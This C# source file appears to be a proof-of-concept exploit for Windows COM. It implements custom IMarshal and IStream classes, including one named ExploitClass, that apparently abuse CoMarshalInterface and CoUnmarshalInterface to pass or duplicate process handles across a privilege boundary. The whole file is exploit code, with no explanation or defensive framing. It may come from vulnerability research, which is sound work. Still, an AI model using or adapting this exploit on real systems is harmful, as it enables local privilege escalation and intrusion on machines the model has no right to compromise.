﻿using System;
using System.IO;
using System.Runtime.InteropServices;
using System.Runtime.InteropServices.ComTypes;

namespace POC
{
    [Guid("00000003-0000-0000-C000-000000000046"), InterfaceType(ComInterfaceType.InterfaceIsIUnknown), ComImport]
    interface IMarshal
    {
        Guid GetUnmarshalClass(
            ref Guid riid,
            IntPtr pv,
            int dwDestContext,
            IntPtr pvDestContext,
            int mshlflags);

        int GetMarshalSizeMax(ref Guid riid,
            IntPtr pv,
            int dwDestContext,
            IntPtr pvDestContext,
            int mshlflags);

        void MarshalInterface(IStream pStm,
                ref Guid riid,
                IntPtr pv,
                int dwDestContext,
                IntPtr pvDestContext,
                int mshlflags);

        [PreserveSig]
        int UnmarshalInterface(IStream pStm, ref Guid riid, out IntPtr ppv);
        void ReleaseMarshalData(IStream pStm);
        void DisconnectObject(int dwReserved);
    }


    [ComImport, Guid("00000001-0000-0000-C000-000000000046"), InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
    public interface IClassFactory
    {
        void CreateInstance(IntPtr pUnkOuter,
            ref Guid riid, out IntPtr ppvObject);
        void LockServer(bool fLock);
    }

    [Guid("fa9812c4-0b34-47d0-9b0b-157fb5b5fdf2"), ComImport, InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
    interface IDuplicateHandleProvider
    {
        IntPtr DuplicateHandleToProcess(int pid, IHandleDuplicator handle_duplicator);
    }

    [Guid("24a0bf18-6849-4d99-9fc8-48bcabace467"), ComImport, InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
    interface IHandleDuplicator
    {
        IntPtr DuplicateGivenHandleFromProcess(int pid, IntPtr input_handle);
    }

    [ComVisible(true)]
    class ClassFactory : IClassFactory
    {
        static void QueryInterface(object obj, ref Guid riid, out IntPtr ppvObject)
        {
            IntPtr unk = Marshal.GetIUnknownForObject(obj);
            Console.WriteLine(riid);
            int result = Marshal.QueryInterface(unk, ref riid, out ppvObject);
            if (result != 0)
            {
                Marshal.ThrowExceptionForHR(result);
            }
        }

        void IClassFactory.CreateInstance(IntPtr pUnkOuter, ref Guid riid, out IntPtr ppvObject)
        {
            Console.WriteLine("Create Instance");
            QueryInterface(new Marshaled(), ref riid, out ppvObject);
        }

        void IClassFactory.LockServer(bool fLock)
        {
        }
    }

    [ComVisible(true), ComDefaultInterface(typeof(IMarshal))]
    class Marshaled : IMarshal
    {
        private IntPtr _obj;

        public Marshaled()
        {
        }

        public Marshaled(object obj)
        {
            _obj = Marshal.GetIUnknownForObject(obj);
        }

        void IMarshal.DisconnectObject(int dwReserved)
        {
        }

        void IMarshal.ReleaseMarshalData(IStream pStm)
        {
        }

        [DllImport("ole32.dll", PreserveSig = false)]
        public static extern int CoUnmarshalInterface(IStream stm, ref Guid riid, out IntPtr ppv);

        int IMarshal.UnmarshalInterface(IStream pStm, ref Guid riid, out IntPtr ppv)
        {
            Console.WriteLine("UnmarshalInterface");
            int hr = CoUnmarshalInterface(pStm, ref riid, out ppv);
            if (hr != 0)
                return hr;
            HandleDuplicator = Marshal.GetObjectForIUnknown(ppv) as IDuplicateHandleProvider;
            return hr;
        }

        public static IDuplicateHandleProvider HandleDuplicator;

        Guid IMarshal.GetUnmarshalClass(ref Guid riid, IntPtr pv, int dwDestContext, IntPtr pvDestContext, int mshlflags)
        {
            throw new NotImplementedException();
        }

        int IMarshal.GetMarshalSizeMax(ref Guid riid, IntPtr pv, int dwDestContext, IntPtr pvDestContext, int mshlflags)
        {
            throw new NotImplementedException();
        }

        void IMarshal.MarshalInterface(IStream pStm, ref Guid riid, IntPtr pv, int dwDestContext, IntPtr pvDestContext, int mshlflags)
        {
            throw new NotImplementedException();
        }
    }

    class MarshaledStreamWrapper : IMarshal, IStream
    {
        private IntPtr _obj;

        public MarshaledStreamWrapper(IStream obj)
        {
            _obj = Marshal.GetIUnknownForObject(obj);
        }

        void IMarshal.DisconnectObject(int dwReserved)
        {
        }

        void IMarshal.ReleaseMarshalData(IStream pStm)
        {
        }

        [DllImport("ole32.dll", PreserveSig = false)]
        public static extern int CoUnmarshalInterface(IStream stm, ref Guid riid, out IntPtr ppv);

        int IMarshal.UnmarshalInterface(IStream pStm, ref Guid riid, out IntPtr ppv)
        {
            throw new NotImplementedException();
        }

        Guid IMarshal.GetUnmarshalClass(ref Guid riid, IntPtr pv, int dwDestContext, IntPtr pvDestContext, int mshlflags)
        {
            return new Guid("0e119e63-267a-4030-8c80-5b1972e0a456");
        }

        int IMarshal.GetMarshalSizeMax(ref Guid riid, IntPtr pv, int dwDestContext, IntPtr pvDestContext, int mshlflags)
        {
            return 1000;
        }

        [DllImport("ole32.dll", PreserveSig = false)]
        static extern void CoMarshalInterface(IStream pStm, ref Guid riid, IntPtr pUnk, int dwDestContext, IntPtr pvDestContext, int mshlflags);

        void IMarshal.MarshalInterface(IStream pStm, ref Guid riid, IntPtr pv, int dwDestContext, IntPtr pvDestContext, int mshlflags)
        {
            Console.WriteLine("Marshal Interface");
            CoMarshalInterface(pStm, ref riid, _obj, dwDestContext, pvDestContext, mshlflags);
            MemoryStream stm = new MemoryStream();
            BinaryWriter writer = new BinaryWriter(stm);
            writer.Write(10);
            writer.Write(1000);
            writer.Write(new byte[6]);
            pStm.Write(stm.ToArray(), (int)stm.Length, IntPtr.Zero);
        }

        void IStream.Read(byte[] pv, int cb, IntPtr pcbRead)
        {
            throw new NotImplementedException();
        }

        void IStream.Write(byte[] pv, int cb, IntPtr pcbWritten)
        {
            throw new NotImplementedException();
        }

        void IStream.Seek(long dlibMove, int dwOrigin, IntPtr plibNewPosition)
        {
            throw new NotImplementedException();
        }

        void IStream.SetSize(long libNewSize)
        {
            throw new NotImplementedException();
        }

        void IStream.CopyTo(IStream pstm, long cb, IntPtr pcbRead, IntPtr pcbWritten)
        {
            throw new NotImplementedException();
        }

        void IStream.Commit(int grfCommitFlags)
        {
            throw new NotImplementedException();
        }

        void IStream.Revert()
        {
            throw new NotImplementedException();
        }

        void IStream.LockRegion(long libOffset, long cb, int dwLockType)
        {
            throw new NotImplementedException();
        }

        void IStream.UnlockRegion(long libOffset, long cb, int dwLockType)
        {
            throw new NotImplementedException();
        }

        void IStream.Stat(out System.Runtime.InteropServices.ComTypes.STATSTG pstatstg, int grfStatFlag)
        {
            throw new NotImplementedException();
        }

        void IStream.Clone(out IStream ppstm)
        {
            throw new NotImplementedException();
        }
    }

    [ComVisible(true)]
    class ExploitClass : IStream, IDuplicateHandleProvider
    {
        private IntPtr _handle;

        public IHandleDuplicator HandleDuplicator;
        public int ProcessId;

        public ExploitClass(IntPtr handle)
        {
            _handle = handle;
        }

        public ExploitClass() : this(IntPtr.Zero)
        {
        }

        public IntPtr DuplicateHandleToProcess(int pid, IHandleDuplicator handle_duplicator)
        {
            ProcessId = pid;
            HandleDuplicator = handle_duplicator;
            return _handle;
        }

        public void Read(byte[] pv, int cb, IntPtr pcbRead)
        {
            Console.WriteLine("Read {0}", cb);
            throw new NotImplementedException();
        }

        public void Write(byte[] pv, int cb, IntPtr pcbWritten)
        {
            throw new NotImplementedException();
        }

        public void Seek(long dlibMove, int dwOrigin, IntPtr plibNewPosition)
        {
            throw new NotImplementedException();
        }

        public void SetSize(long libNewSize)
        {
            throw new NotImplementedException();
        }

        public void CopyTo(IStream pstm, long cb, IntPtr pcbRead, IntPtr pcbWritten)
        {
            throw new NotImplementedException();
        }

        public void Commit(int grfCommitFlags)
        {
            throw new NotImplementedException();
        }

        public void Revert()
        {
            throw new NotImplementedException();
        }

        public void LockRegion(long libOffset, long cb, int dwLockType)
        {
            throw new NotImplementedException();
        }

        public void UnlockRegion(long libOffset, long cb, int dwLockType)
        {
            throw new NotImplementedException();
        }

        public void Stat(out System.Runtime.InteropServices.ComTypes.STATSTG pstatstg, int grfStatFlag)
        {
            throw new NotImplementedException();
        }

        public void Clone(out IStream ppstm)
        {
            throw new NotImplementedException();
        }
    }
}
